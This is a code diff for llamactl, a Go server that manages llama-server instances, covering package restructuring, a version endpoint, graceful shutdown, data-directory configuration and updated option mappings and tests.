@@ -441,7 +440,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -470,12 +469,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid request body
schema:
@@ -504,12 +503,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -627,7 +626,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -654,7 +653,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -681,7 +680,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -777,7 +776,7 @@ paths:
"200":
description: List of OpenAI-compatible instances
schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
$ref: '#/definitions/server.OpenAIListInstancesResponse'
"500":
description: Internal Server Error
schema:
@@ -787,4 +786,21 @@ paths:
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0"

View File

@@ -2,11 +2,20 @@ package main
import (
"fmt"
llamactl "llamactl/pkg"
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http"
"os"
"os/signal"
"syscall"
)
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API
// @version 1.0
// @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
// @basePath /api/v1
func main() {
config, err := llamactl.LoadConfig("")
// --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
}
// Create the log directory if it doesn't exist
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
if err != nil {
fmt.Printf("Error creating log directory: %v\n", err)
return
// Set version information
cfg.Version = version
cfg.CommitHash = commitHash
cfg.BuildTime = buildTime
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
}
// Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances)
instanceManager := manager.NewInstanceManager(cfg.Instances)
// Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config)
handler := server.NewHandler(instanceManager, cfg)
// Setup the router with the handler
r := llamactl.SetupRouter(handler)
r := server.SetupRouter(handler)
// Start the server with the router
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
// Handle graceful shutdown
stop := make(chan os.Signal, 1)
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()
// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}
// Wait for all instances to stop
instanceManager.Shutdown()
fmt.Println("Exiting llamactl.")
}

BIN
docs/images/screenshot.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 47 KiB

View File

@@ -1,4 +1,4 @@
package llamactl
package llamacpp
import (
"encoding/json"
@@ -15,12 +15,12 @@ type LlamaServerOptions struct {
CPUMask string `json:"cpu_mask,omitempty"`
CPURange string `json:"cpu_range,omitempty"`
CPUStrict int `json:"cpu_strict,omitempty"`
Priority int `json:"priority,omitempty"`
Prio int `json:"prio,omitempty"`
Poll int `json:"poll,omitempty"`
CPUMaskBatch string `json:"cpu_mask_batch,omitempty"`
CPURangeBatch string `json:"cpu_range_batch,omitempty"`
CPUStrictBatch int `json:"cpu_strict_batch,omitempty"`
PriorityBatch int `json:"priority_batch,omitempty"`
PrioBatch int `json:"prio_batch,omitempty"`
PollBatch int `json:"poll_batch,omitempty"`
CtxSize int `json:"ctx_size,omitempty"`
Predict int `json:"predict,omitempty"`
@@ -83,7 +83,7 @@ type LlamaServerOptions struct {
Seed int `json:"seed,omitempty"`
SamplingSeq string `json:"sampling_seq,omitempty"`
IgnoreEOS bool `json:"ignore_eos,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
Temperature float64 `json:"temp,omitempty"`
TopK int `json:"top_k,omitempty"`
TopP float64 `json:"top_p,omitempty"`
MinP float64 `json:"min_p,omitempty"`
@@ -110,7 +110,7 @@ type LlamaServerOptions struct {
JSONSchema string `json:"json_schema,omitempty"`
JSONSchemaFile string `json:"json_schema_file,omitempty"`
// Server/Example-specific params
// Example-specific params
NoContextShift bool `json:"no_context_shift,omitempty"`
Special bool `json:"special,omitempty"`
NoWarmup bool `json:"no_warmup,omitempty"`
@@ -150,17 +150,15 @@ type LlamaServerOptions struct {
NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"`
SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"`
// Speculative decoding params
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
// Audio/TTS params
ModelVocoder string `json:"model_vocoder,omitempty"`
@@ -199,62 +197,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// Handle alternative field names
fieldMappings := map[string]string{
// Official llama-server short forms from the documentation
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict, --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"s": "seed", // -s, --seed SEED
"temp": "temperature", // --temp N
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
// Common params
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict N
"n-predict": "predict", // --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"n-gpu-layers": "gpu_layers", // --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"log-verbose": "verbose", // --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"log-verbosity": "verbosity", // --log-verbosity N
// Sampling params
"s": "seed", // -s, --seed SEED
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
// Example-specific params
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"embeddings": "embedding", // --embeddings
"rerank": "reranking", // --reranking
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"draft": "draft-max", // -draft, --draft-max N
"draft-n": "draft-max", // --draft-n-max N
"draft-n-min": "draft_min", // --draft-n-min N
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"n-gpu-layers-draft": "gpu_layers_draft", // --n-gpu-layers-draft N
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
}
// Process alternative field names

View File

@@ -1,17 +1,16 @@
package llamactl_test
package llamacpp_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"reflect"
"slices"
"testing"
llamactl "llamactl/pkg"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamactl.LlamaServerOptions
options llamacpp.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 8080,
Threads: 4,
CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
args := options.BuildCommandArgs()
expectedPairs := map[string]string{
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temperature": "0.7",
"--top-k": "40",
"--top-p": "0.9",
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temp": "0.7",
"--top-k": "40",
"--top-p": "0.9",
}
for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
CtxSize: 4096,
GPULayers: 32,
ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"verbose": true,
"ctx_size": 4096,
"gpu_layers": 32,
"temperature": 0.7
"temp": 0.7
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamactl.LlamaServerOptions) error
checkFn func(llamacpp.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)

View File

@@ -1,4 +1,4 @@
package llamactl
package config
import (
"os"
@@ -10,11 +10,14 @@ import (
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
@@ -37,8 +40,17 @@ type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
@@ -54,6 +66,15 @@ type InstancesConfig struct {
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
@@ -76,9 +97,9 @@ type AuthConfig struct {
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := Config{
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
@@ -86,13 +107,19 @@ func LoadConfig(configPath string) (Config, error) {
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
@@ -114,7 +141,7 @@ func LoadConfig(configPath string) (Config, error) {
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
@@ -138,7 +165,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
@@ -157,15 +184,28 @@ func loadEnvVars(cfg *Config) {
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
@@ -189,6 +229,21 @@ func loadEnvVars(cfg *Config) {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
@@ -231,64 +286,63 @@ func ParsePortRange(s string) [2]int {
return [2]int{0, 0} // Invalid format
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use proper Application Support directories
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations

View File

@@ -1,16 +1,15 @@
